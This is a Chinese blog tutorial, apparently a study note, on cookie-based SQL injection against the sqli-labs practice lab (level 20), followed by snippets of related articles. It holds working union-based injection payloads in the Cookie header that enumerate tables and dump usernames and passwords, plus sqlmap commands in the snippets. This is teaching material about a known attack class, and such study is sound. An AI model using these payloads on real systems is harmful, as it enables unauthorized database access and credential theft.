sql注入类型之cookie注入

最新推荐文章于 2023-10-13 13:37:27 发布
最新推荐文章于 2023-10-13 13:37:27 发布
阅读量4.8k 收藏 3
点赞数 3
文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hhhshd/article/details/121280255
版权

sql注入类型

通过上一次的sql注入类型学习中,学习到了两个基本的注入类型数字型注入和字符型注入。 此篇文章将更加深入学习sql注入中更多的注入类型。

  1. 数字型注入
  2. 字符型注入
  3. cookie注入

cookie注入

cookie注入学习之前,我们通过sqlilabs中我们通过Post注入和cookie注入中的第十一题与二十题的php代码进行分析

  1. 此图片为sqlilabs中第十一题Post注入中php代码, 通过下面图片代码分析,在Post注入中Post是没有做任何的防护措施,所以注入可以通过Post注入的方式。

$ uname=$_POST[‘uname’];
$ passwd=$_POST[‘passwd’];

在这里插入图片描述

  1. 此图片为sqlilabs中第二十题中的php代码,通过下面图片对代码进行分析
    第一张图中使用了魔术引号,所以在第二十题中Post注入无法得到生效

get_magic_quotes_gpc()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uLXOBHyG-1636673610393)(1_md_files%5Cimage%20%284%29.png?v=1&type=image)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-J2P0RZU1-1636673610394)(1_md_files%5Cimage%20%283%29.png?v=1&type=image)]

知识点扩展:魔术引号

我们通过第二十题中的php代码来分析魔术引号,我们在第二十题php中此处加入下面一条命令来查看魔术引号的使用效果

echo $ sql;

在这里插入图片描述

  1. 通过我们添加echo $sql查看的效果发现在Post注入时候,魔术引号就起作用了将数据库或文件中读取数据时,对单引号、双引号、反斜线、NULL加上一个反斜线进行转义
    在这里插入图片描述

魔术引号:通过下面三句代码我们来分析魔术引号进行分析

”select * from ‘表名’ where field1 = $ para and field2 = ‘xxx’”
当我们在$ para中进行传参的时候,如果我们传入了双引号、单引号反斜线、NULL加上一个反斜线进行转义。
“select * from ‘表名’ where field1 = " shiyan and field2 =‘xxx’”
"select * from ‘表名’ where field1 = “shiyan and field2= ‘xxx’”

cookie注入

  1. 了解了魔术引号我们对于第二十题就不能用Post注入了,所以就回到本次笔记的内容,cookie注入。
  2. cookie注入中我们需要用到burpsuite抓包

  • 使用burpsuite将拦截包的intercept is off打开变为on
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qiKWCLeu-1636673610397)(1_md_files%5Cimage%20%289%29.png?v=1&type=image)]

  • 使用火狐浏览器在当前靶场第二十题中进行随便的账号和密码的输入
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6CkjKewW-1636673610398)(1_md_files%5Cimage%20%287%29.png?v=1&type=image)]

  • 这时我们的burpsutie已经抓取到了靶场输入用户名密码的信息
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jcc2zBK3-1636673610398)(1_md_files%5Cimage%20%288%29.png?v=1&type=image)]

  1. 我们抓取到了包后反击鼠标右键,然后Send to Repeater进行编辑来实现后续的注入步骤
    在这里插入图片描述

  2. 编辑Repeater中将原本的uname=zjx&passwd=zjx&submit=Submit,复制到我们自己输入的Cookie: 这个字段的后面。我们进行查看
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-v47tn5aX-1636673610400)(1_md_files%5Cimage%20%2812%29.png?v=1&type=image)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JclsjrDU-1636673610401)(1_md_files%5Cimage%20%2814%29.png?v=1&type=image)]

  3. 此时我们再在我输入的用户后方使用单引号来闭合数据并进行查看数据库的字段数

Cookie: uname=zjx’ order by 4#&passwd=zjx&submit=Submit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PsMrR3ab-1636673610401)(1_md_files%5Cimage%20%2816%29.png?v=1&type=image)]

Cookie: uname=zjx’ order by 3#&passwd=zjx&submit=Submit 将字段改为3发现没有报错

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RDkhosHF-1636673610402)(1_md_files%5Cimage%20%2818%29.png?v=1&type=image)]

  1. 我们使用union查询来查询一下数据回显的位置,发现在两处位置产生了回显显示,我们将2位置改为database()查询数据库的名称,于是查询到数据库名称
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WnsUKXWj-1636673610402)(1_md_files%5Cimage%20%2820%29.png?v=1&type=image)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-viWG99X5-1636673610403)(1_md_files%5Cimage%20%2819%29.png?v=1&type=image)]

  2. 已经查询数据库名称为security,使用union查询数据库中所有的表

Cookie: uname=zjx’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’#&passwd=zjx&submit=Submit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-B1029xFk-1636673610403)(1_md_files%5Cimage%20%2821%29.png?v=1&type=image)]

  1. 查询在数据库security下有emails,referers,uagents,users表名,使用union查询表下的字段信息,这里我查看的是users下的字段信息

Cookie: uname=zjx’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’#&passwd=zjx&submit=Submit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-c7g262tN-1636673610404)(1_md_files%5Cimage%20%2822%29.png?v=1&type=image)]

  1. 已经知道users表下的字段名称,使用union命令就可以查询数据了

Cookie: uname=zjx’ union select id,username,password from users limit 0,1#&passwd=zjx&submit=Submit
在这里插入图片描述

兔子呀~
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《WEB安全渗透测试》(8)SQL注入实战:cookie注入
午夜安全
10-24 1221
《WEB安全渗透测试》(8)SQL注入实战:cookie注入 在这个URL里没有发现参数,使用Burp抓取数据后,发现cookie里存在数据。1)判断是否存在注入cookie里依次做如下修改:id=1’,id=1 and 1=1,id=1 and 1=2结果如下,说明存在SQL注入漏洞。2)查询字段数量判断出字段数量是:3。查询SQL语句插入位置。3)查询数据库库名(1)查询当前数据库库名(2)查询所有数据库库名像这样,构造不同的union注入语句......
Sql漏洞注入cookie注入
Matheus的博客
08-01 1487
Cookie注入攻击 我们知道,一般的防注入程序都是基于“黑名单”的,根据特征字符串去过滤掉一些危险的字符。一般情况下,黑名单是不安全的,它存在被绕过的风险。比如有的防注入程序只过滤了通过GET、POST方式提交的数据,对通过Cookie方式提交的数据却并没有过滤,我们可以使用Cookie注入攻击。简单说, cookie是服务器给客户端的一种加密凭证,通常由客户端存储在本地,比如客户A 访问 XXXX.com,网页给了客户A一个123的凭证,客户B也去访问那个网址,网站给B一个456的凭证,以后A和B去访问
SQL注入Cookie注入
weixin_43765321的博客
03-03 1116
1. Cookie背景介绍 Cookie最先是由Netscape (网景)公司提出的,Netscape官方文档中对Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。 Cookie的用途非常广泛,在网络中经常可以见到Cookie的身影。它通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站和电子商务网站中的“购物车”。 2. Cookie注入原理 Request对象的使用方法一般是这样的: reques
SQL注入-cookie注入
LJH1999ZN的博客
02-11 1922
cookie 注入
SQL注入Cookie注入
zh的博客
10-11 192
靶场地址:http://www.whalwl.host:8009 解题准备:本题需要使用sqlmap,kali自带 解题思路: 1、根据提示,添加cookie参数id=1,放到sqlmap中跑 sqlmap -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1" --dbms mysql --level 2 显示存在注入 2、继续爆库名 sqlmap -u "http://www.whalwl.host:8009/u..
SQL注入——cookie注入
weixin_74991270的博客
10-10 526
工具很方面,但是IP老是被ban手工虽说很麻烦,但是还是有惊喜的多挖挖src增加实战经验。
SQL Injection5(cookie注入
kid的博客
05-05 1716
SQL Injection5(cookie注入) 前言 我认为sql注入分为两种类型,一种字符型,一种数字型 这里的cookie注入,包括宽字节注入等等,更像是一种找注入点的方法吧。 cookie注入原理 如果你学过ASP 你应该会知道 Request.QueryString (GET) 或 Request.Form (POST)! 呵,没错,这就是我们用于读取用户发给WEB服务器的指定键中的值...
360提供的phpsql注入代码修改类
05-02
SQL注入是一种利用网站应用程序的漏洞,通过输入恶意SQL语句来控制数据库的攻击手段。攻击者可以获取、修改、删除数据库中的敏感信息,甚至完全控制整个系统。为了防止SQL注入,我们需要遵循以下原则: 1. 使用...
第14天:WEB漏洞-SQL注入类型及提交注入1
08-03
本文将详细介绍SQL注入类型及其提交方式,以及如何进行安全测试。 首先,我们需要了解数据的提交类型。在Web应用中,数据可以通过多种方式传递给服务器: 1. **数字型参数**:通常用于传递数值,如ID或年龄。...
sql注入攻击之sqlmap
06-10
SQL注入攻击是网络安全领域中的一个重要话题,它涉及数据库和Web应用程序的交互。SQL注入是指攻击者通过在输入字段中插入恶意的SQL代码,欺骗Web应用执行非授权的数据库操作,从而获取敏感信息或破坏数据库系统。...
SQL注入--利用cookie进行注入
pakho_C的博客
01-04 649
SQL注入–利用cookie进行注入 靶场:sqli-labs-master 下载链接:靶场下载链接 第20关 php源码: <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); if(!isset($_COOKIE['uname'])) { //including the Mysql connect parameter
SQL注入cookie注入
梁顿的专栏
09-27 821
SQL注入cookie注入
SQL注入cookie注入:原理、步骤、示例
07-08 4780
SQL-cookie注入
SQL注入之路之八:Cookie注入
weixin_62715196的博客
08-14 258
文章主要讲述Cookie注入的一次实操过程
SQL注入(Cookie注入)---zkaq
weixin_38237216的博客
04-09 867
1.概念 1.Cookie注入:简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie注入与传统的SQL注入并无不同,两者都是针对数据库的注入,只是表现形式上略有不同。 ​ 原理:php中的$_REQUEST[] 可以获取POST|GET|COOKIE传参(php 5.4以上版本就不会接受Cookie传参了) 2.修改cookie的方式 burp抓包直接修改 在浏览器的开发者工具里面修改设置 a.console设置----document.cookie=“id=”+escap
渗透测试---手把手教你SQL注入(5)---Cookie注入,宽字节注入与堆叠注入
最新发布
weixin_52796034的博客
10-13 546
SQL注入中,尤其是使用ASP的网站中,Cookie注入是一种常见的攻击方式。Cookie是Web应用程序在客户端计算机上存储的小型数据片段,用于跟踪用户会话状态和存储其他个性化信息。有时我们可以通过在Cookie注入恶意代码来绕过一些安全措施,并执行恶意的SQL查询。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值